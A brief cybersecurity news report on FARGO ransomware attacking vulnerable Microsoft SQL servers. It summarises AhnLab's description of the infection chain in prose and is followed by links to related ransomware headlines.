Threat actors have been targeting vulnerable Microsoft SQL servers with the FARGO ransomware, also known as Mallox and TargetCompany, according to BleepingComputer.
FARGO ransomware infections commence with the use of cmd.exe and powershell.exe to download a .NET file, which facilitates additional malware and locker retrieval, as well as the generation and execution of a BAT file tasked with process and service termination, an AhnLab Security Emergency Response Center report showed.
Self-injection of the ransomware payload into AppLaunch.exe then follows in an attempt to remove an open-source ransomware vaccine registry key.
While the recovery deactivation command is executed by the malware, FARGO ransomware has not been encrypting key software and directories, including Microsoft Windows system directories, Tor Browser, Internet Explorer, boot files, debug log file, and thumbnail database, as well as user customizations and settings. Encrypted files are then renamed with the ".Fargo3" extension and victims are then being threatened with data leaks should they refuse to pay the demanded ransom, said researchers.
Vulnerabilities impacting cloud analytics and business intelligence software Qlik Sense have been exploited to facilitate the deployment of CACTUS ransomware in a new campaign, The Hacker News reports.
Staples cyberattack disrupts online orders BleepingComputer reports that outages at American office supply retail chain that disrupted online orders were confirmed to have been caused by a cyberattack.
Cyber Resilience in the Ransomware and Wiper Era New Strategies for CISOs to Protect
The changing face of ransomware, and how to respond
Unveiling the Hidden Threat: Hybrid Attackers Leveraging Identities to Execute Ransomware
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news